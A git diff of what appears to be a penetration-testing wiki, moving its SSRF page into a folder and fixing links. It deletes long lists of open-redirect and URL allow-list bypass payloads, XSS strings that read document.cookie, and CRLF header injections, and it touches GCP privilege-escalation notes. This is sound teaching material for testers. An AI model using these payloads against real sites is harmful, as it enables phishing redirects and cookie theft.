diff --git a/.gitbook/assets/image (649) (1).png b/.gitbook/assets/image (649) (1).png new file mode 100644 index 000000000..1e2588800 Binary files /dev/null and b/.gitbook/assets/image (649) (1).png differ diff --git a/.gitbook/assets/image (649).png b/.gitbook/assets/image (649).png index 1e2588800..0ebce7d02 100644 Binary files a/.gitbook/assets/image (649).png and b/.gitbook/assets/image (649).png differ diff --git a/SUMMARY.md b/SUMMARY.md index ef3413deb..9aaca37e0 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -438,7 +438,10 @@ * [Mysql SSRF](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md) * [SQLMap - Cheetsheat](pentesting-web/sql-injection/sqlmap/README.md) * [Second Order Injection - SQLMap](pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md) -* [SSRF (Server Side Request Forgery)](pentesting-web/ssrf-server-side-request-forgery.md) +* [SSRF (Server Side Request Forgery)](pentesting-web/ssrf-server-side-request-forgery/README.md) + * [URL Format Bypass](pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md) + * [SSRF Vulnerable Platforms](pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md) + * [Cloud SSRF](pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md) * [SSTI (Server Side Template Injection)](pentesting-web/ssti-server-side-template-injection/README.md) * [EL - Expression Language](pentesting-web/ssti-server-side-template-injection/el-expression-language.md) * [Reverse Tab Nabbing](pentesting-web/reverse-tab-nabbing.md) diff --git a/cloud-security/gcp-security/README.md b/cloud-security/gcp-security/README.md index f01c09a40..d72b583a4 100644 --- a/cloud-security/gcp-security/README.md +++ b/cloud-security/gcp-security/README.md @@ -280,7 +280,7 @@ Supposing that you have compromised a VM in GCP, there are some **GCP privileges [gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md) {% endcontent-ref %} -If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery.md#6440). +If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery/#6440). ## Cloud privilege escalation @@ -368,8 +368,6 @@ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions. - - ### Service account impersonation Impersonating a service account can be very useful to **obtain new and better privileges**. @@ -377,7 +375,7 @@ Impersonating a service account can be very useful to **obtain new and better pr There are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating\_a\_service\_account): * Authentication **using RSA private keys** (covered [above](./#bypassing-access-scopes)) -* Authorization **using Cloud IAM policies** (covered [here](broken-reference)) +* Authorization **using Cloud IAM policies** (covered [here](broken-reference/)) * **Deploying jobs on GCP services** (more applicable to the compromise of a user account) ### Granting access to management console @@ -398,7 +396,7 @@ This is the **highest level you can assign using the gcloud tool**. ### Spreading to Workspace via domain-wide delegation of authority -[**Workspace**](https://gsuite.google.com) is Google's c**ollaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc. +[**Workspace**](https://gsuite.google.com) is Google's c**ollaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc. **Service accounts** in GCP can be granted the **rights to programatically access user data** in Workspace by impersonating legitimate users. This is known as [domain-wide delegation](https://developers.google.com/admin-sdk/reports/v1/guides/delegation). This includes actions like **reading** **email** in GMail, accessing Google Docs, and even creating new user accounts in the G Suite organization. @@ -446,10 +444,10 @@ If you have success creating a new admin account, you can log on to the [Google Another promising way to **escalate privileges inside the cloud is to enumerate as much sensitive information as possible** from the services that are being used. Here you can find some enumeration recommendations for some GCP services, but more could be used so feel free to submit PRs indicating ways to enumerate more services: {% hint style="info" %} -Note that you can enumerate most resources with `list` (list items of that type), `describe` (describe parent and children items) and `get-iam-policy` (get policy attached to that specific resource). +Note that you can enumerate most resources with `list` (list items of that type), `describe` (describe parent and children items) and `get-iam-policy` (get policy attached to that specific resource). {% endhint %} -There is a gcloud API endpoint that aims to **list all the resources the accessible from the used user accoun**t, it's in alpha bet and only supports a couple of resources, but maybe in the future you can list all you have access to with it: [https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/](https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/) +There is a gcloud API endpoint that aims to **list all the resources the accessible from the used user accoun**t, it's in alpha bet and only supports a couple of resources, but maybe in the future you can list all you have access to with it: [https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/](https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/) {% content-ref url="gcp-buckets-enumeration.md" %} [gcp-buckets-enumeration.md](gcp-buckets-enumeration.md) diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md index dd85294c9..8831747ee 100644 --- a/pentesting-web/csrf-cross-site-request-forgery.md +++ b/pentesting-web/csrf-cross-site-request-forgery.md @@ -120,19 +120,9 @@ Some applications validate the Referer header when it is present in requests but #### Regexp bypasses -``` -https://hahwul.com (O) -https://hahwul.com?white_domain_com (O) -https://hahwul.com;white_domain_com (O) -https://hahwul.com/white_domain_com/../target.file (O) -https://white_domain_com.hahwul.com (O) -https://hahwulwhite_domain_com (O) -file://123.white_domain_com (X) -https://white_domain_com@hahwul.com (X) -https://hahwul.com#white_domain_com (X) -https://hahwul.com\.white_domain_com (X) -https://hahwul.com/.white_domain_com (X) -``` +{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} +[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md) +{% endcontent-ref %} To set the domain name of the server in the URL that the Referrer is going to send inside the parameters you can do: diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md index bb6b3bd30..4dd9e00f3 100644 --- a/pentesting-web/file-upload/README.md +++ b/pentesting-web/file-upload/README.md @@ -139,10 +139,10 @@ Note that **another option** you may be thinking of to bypass this check is to m * [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload) * [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files) * [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/) -* If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery.md). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**. +* If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**. * [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md) * Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications. -* Upload the **\*\*\[**eicar**]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus\*\* +* Upload the **\*\*\[eicar]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus\*\* * Check if there is any **size limit** uploading files Here’s a top 10 list of things that you can achieve by uploading (from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)): @@ -189,7 +189,7 @@ The decompressed files will be created in unexpected folders. One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application. -An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc)**** +An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc)\*\*\*\* ```python python2 evilarc.py -h diff --git a/pentesting-web/http-response-smuggling-desync.md b/pentesting-web/http-response-smuggling-desync.md index 83760a614..e8aae8a46 100644 --- a/pentesting-web/http-response-smuggling-desync.md +++ b/pentesting-web/http-response-smuggling-desync.md @@ -112,7 +112,7 @@ In order to achieve this, the attacker needs to find an endpoint of the web appl He will send a **exploit** like: -![](<../.gitbook/assets/image (649).png>) +![](<../.gitbook/assets/image (649) (1).png>) After the first request is resolved and sent back to the attacker, the **victims request is added into the queue**: diff --git a/pentesting-web/open-redirect.md b/pentesting-web/open-redirect.md index 0f9a2baac..cfee13a2d 100644 --- a/pentesting-web/open-redirect.md +++ b/pentesting-web/open-redirect.md @@ -2,123 +2,11 @@ ## Open redirect -### Exploitation +### Redirect to localhost or arbitrary domains -Using a whitelisted domain or keyword - -``` -www.whitelisted.com.evil.com redirect to evil.com -https://www.target01.com//example.com/ redirect to //example.com/ -https://www.target01.com%09.example.com redirect to example.com -https://www.target01.com%252e.example.com redirect to example.com -``` - -Using "//" to bypass "http" blacklisted keyword - -``` -//google.com -``` - -Using "https:" to bypass "//" blacklisted keyword - -``` -https:google.com -``` - -Using "//" to bypass "//" blacklisted keyword (Browsers see // as //) - -``` -\/\/google.com/ -/\/google.com/ -``` - -Using "/\\" to bypass: - -``` -/\google.com -``` - -Using "%E3%80%82" to bypass "." blacklisted character - -``` -//google%E3%80%82com -``` - -Using null byte "%00" to bypass blacklist filter - -``` -//google%00.com -``` - -Using parameter pollution - -``` -?next=whitelisted.com&next=google.com -``` - -Using "@" character, browser will redirect to anything after the "@" - -``` -http://www.theirsite.com@yoursite.com/ -``` - -Creating folder as their domain - -``` -http://www.yoursite.com/http://www.theirsite.com/ -http://www.yoursite.com/folder/www.folder.com -``` - -XSS from Open URL - If it's in a JS variable - -``` -";alert(0);// -``` - -XSS from data:// wrapper - -``` -http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg== -``` - -Username - -```php -https://www.victim.com@attacker.com -https://www.victim.co%6D@attacker.com -https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com -``` - -IP formats - -```php -216.58.215.78 -- Regular -3627734862 -- Decimal -0330.0072.0327.0116 -- Octal -00000330.00000072.00000327.00000116 -- Octal with junk zeros -0xd83ad74e -- Hex -0xd8.0x3a.0xd7.0x4e -- Hex (dot sepparated) -0x000000d8.0x0000003a.0x000000d7.0x0000004e -- Hex (dot sepparated) with junk zeros -``` - -You can also mix the different IP formats: - -![](<../.gitbook/assets/image (503).png>) - -You can play with the different IP formats in [https://www.silisoftware.com/tools/ipconverter.php](https://www.silisoftware.com/tools/ipconverter.php) - -Parsing - -``` -http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com -List: -① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ -⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ -⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ -⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ -Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ -ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ -``` +{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} +[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md) +{% endcontent-ref %} ### Open Redirect to XSS @@ -162,502 +50,7 @@ javascript:prompt(1) jaVAscript://whitelisted.com//%0d%0aalert(1);// javascript://whitelisted.com?%a0alert%281%29 /x:1/:///%01javascript:alert(document.cookie)/ -``` - -### More domain bypasses - -``` -<>//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -//;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ// -////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -///\;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ// -///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -//\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ// -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -/〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -\/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%00。Pⓦ -%01https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -%01https://google.com -////%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -///%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -//%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -////%09/google.com -///%09/google.com -//%09/google.com -/%09/google.com -////%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -///%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -//%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -////%09/whitelisted.com@google.com -///%09/whitelisted.com@google.com -//%09/whitelisted.com@google.com -/%09/whitelisted.com@google.com -&%0d%0a1Location:https://google.com -\152\141\166\141\163\143\162\151\160\164\072alert(1) -%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529 -////216.58.214.206 -///216.58.214.206 -//216.58.214.206 -/\216.58.214.206 -/216.58.214.206 -216.58.214.206 -////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e -///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e -////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f -///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f -////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f.. -///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f.. -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f.. -%2f216.58.214.206// -%2f216.58.214.206 -%2f216.58.214.206%2f%2f -////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -//%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -%2f$2f216.58.214.206 -$2f%2f216.58.214.206%2f%2f -%2f$2f3627734734 -$2f%2f3627734734%2f%2f -//%2f%2fgoogle.com -/%2f%2fgoogle.com -$2f%2fgoogle.com -%2f$2fgoogle.com -$2f%2fgoogle.com%2f%2f -%2f3627734734// -%2f3627734734 -%2f3627734734%2f%2f -/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ -/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/ -%2fgoogle.com// -%2fgoogle.com -%2fgoogle.com%2f%2f -////3627734734 -///3627734734 -//3627734734 -/\3627734734 -/3627734734 -3627734734 -//3H6k7lIAiqjfNeN@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -//3H6k7lIAiqjfNeN@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -//3H6k7lIAiqjfNeN@whitelisted.com@google.com/ -//3H6k7lIAiqjfNeN@whitelisted.com+@google.com/ -////%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -///%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -//%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -////%5cgoogle.com -///%5cgoogle.com -//%5cgoogle.com -/%5cgoogle.com -////%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -///%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -//%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -////%5cwhitelisted.com@google.com -///%5cwhitelisted.com@google.com -//%5cwhitelisted.com@google.com -/%5cwhitelisted.com@google.com -/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d -%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d -%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77 -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@whitelisted.com/ -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@whitelisted.com/ ";alert(0);// -data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4= -data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg== -data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= -data:whitelisted.com;text/html;charset=UTF-8, -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw -//google%00.com -/\google%252ecom -google%252ecom -<>//google.com -/<>//google.com -//;@google.com -///;@google.com -/////google.com/ -/////google.com -////\;@google.com -////google.com// -////google.com/ -////google.com -///\;@google.com -///google.com// -///google.com/ -///google.com -//\/google.com/ -//\google.com -//google.com// -//google.com/ -//google.com -/.google.com -/\/\/google.com/ -/\/google.com/ -/\/google.com -/\google.com -/〱google.com -/google.com -../google.com -.google.com -@google.com -\/\/google.com/ -〱google.com -google.com -google.com%23@whitelisted.com -////google.com/%2e%2e -///google.com/%2e%2e -//google.com/%2e%2e -/google.com/%2e%2e -//google.com/%2E%2E -////google.com/%2e%2e%2f -///google.com/%2e%2e%2f -//google.com/%2e%2e%2f -////google.com/%2f.. -///google.com/%2f.. -//google.com/%2f.. -//google.com/%2F.. -/google.com/%2F.. -////google.com/%2f%2e%2e -///google.com/%2f%2e%2e -//google.com/%2f%2e%2e -/google.com/%2f%2e%2e -//google.com//%2F%2E%2E -//google.com:80?@whitelisted.com/ -//google.com:80#@whitelisted.com/ -google.com/.jpg -//google.com\twhitelisted.com/ -//google.com/whitelisted.com -//google.com\@whitelisted.com -google.com/whitelisted.com -//google%E3%80%82com -/http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -http://;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -http://.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -http:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -http://00330.00072.0000326.00000316 -http:00330.00072.0000326.00000316 -http://00330.0x3a.54990 -http:00330.0x3a.54990 -http://00330.3856078 -http:00330.3856078 -http://0330.072.0326.0316 -http:0330.072.0326.0316 -http:%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -http:%0a%0dgoogle.com -http://0xd8.072.54990 -http:0xd8.072.54990 -http://0xd8.0x3a.0xd6.0xce -http:0xd8.0x3a.0xd6.0xce -http://0xd8.3856078 -http:0xd8.3856078 -http://0xd83ad6ce -http:0xd83ad6ce -http://[::216.58.214.206] -http:[::216.58.214.206] -http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%23.whitelisted.com/ -http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%2f%2f.whitelisted.com/ -http://3627734734 -http:3627734734 -http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%3F.whitelisted.com/ -http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 -http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 -http://3H6k7lIAiqjfNeN@00330.0x3a.54990 -http:3H6k7lIAiqjfNeN@00330.0x3a.54990 -http://3H6k7lIAiqjfNeN@00330.3856078 -http:3H6k7lIAiqjfNeN@00330.3856078 -http://3H6k7lIAiqjfNeN@0330.072.0326.0316 -http:3H6k7lIAiqjfNeN@0330.072.0326.0316 -http://3H6k7lIAiqjfNeN@0xd8.072.54990 -http:3H6k7lIAiqjfNeN@0xd8.072.54990 -http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce -http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce -http://3H6k7lIAiqjfNeN@0xd8.3856078 -http:3H6k7lIAiqjfNeN@0xd8.3856078 -http://3H6k7lIAiqjfNeN@0xd83ad6ce -http:3H6k7lIAiqjfNeN@0xd83ad6ce -http://3H6k7lIAiqjfNeN@[::216.58.214.206] -http:3H6k7lIAiqjfNeN@[::216.58.214.206] -http://3H6k7lIAiqjfNeN@3627734734 -http:3H6k7lIAiqjfNeN@3627734734 -http://3H6k7lIAiqjfNeN@472.314.470.462 -http:3H6k7lIAiqjfNeN@472.314.470.462 -http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] -http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] -http://3H6k7lIAiqjfNeN@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -http://3H6k7lIAiqjfNeN@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -http://3H6k7lIAiqjfNeN@whitelisted.com@google.com/ -http://3H6k7lIAiqjfNeN@whitelisted.com+@google.com/ -http://472.314.470.462 -http:472.314.470.462 -http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%5c%5c.whitelisted.com/ -/http://%67%6f%6f%67%6c%65%2e%63%6f%6d -http://%67%6f%6f%67%6c%65%2e%63%6f%6d -http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@whitelisted.com/ -http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@whitelisted.com/ -http://[::ffff:216.58.214.206] -http:[::ffff:216.58.214.206] -/http://google.com -/http:/google.com -http://;@google.com -http://.google.com -http://google.com -http:/\/\google.com -http:/google.com -http:google.com -http://google.com%23.whitelisted.com/ -http://google.com%2f%2f.whitelisted.com/ -http://google.com%3F.whitelisted.com/ -http://google.com%5c%5c.whitelisted.com/ -http://google.com:80?@whitelisted.com/ -http://google.com:80#@whitelisted.com/ -http://google.com\twhitelisted.com/ -//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ// -/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ// -https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -https:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -https://%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/https://%09/google.com -https://%09/google.com -https://%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -https://%09/whitelisted.com@google.com -https://%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -https://%0a%0dgoogle.com -//https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e -/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e -https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e -//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f -https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f -/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f.. -https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f.. -/https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -https%3a%2f%2fgoogle.com%2f -/https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ 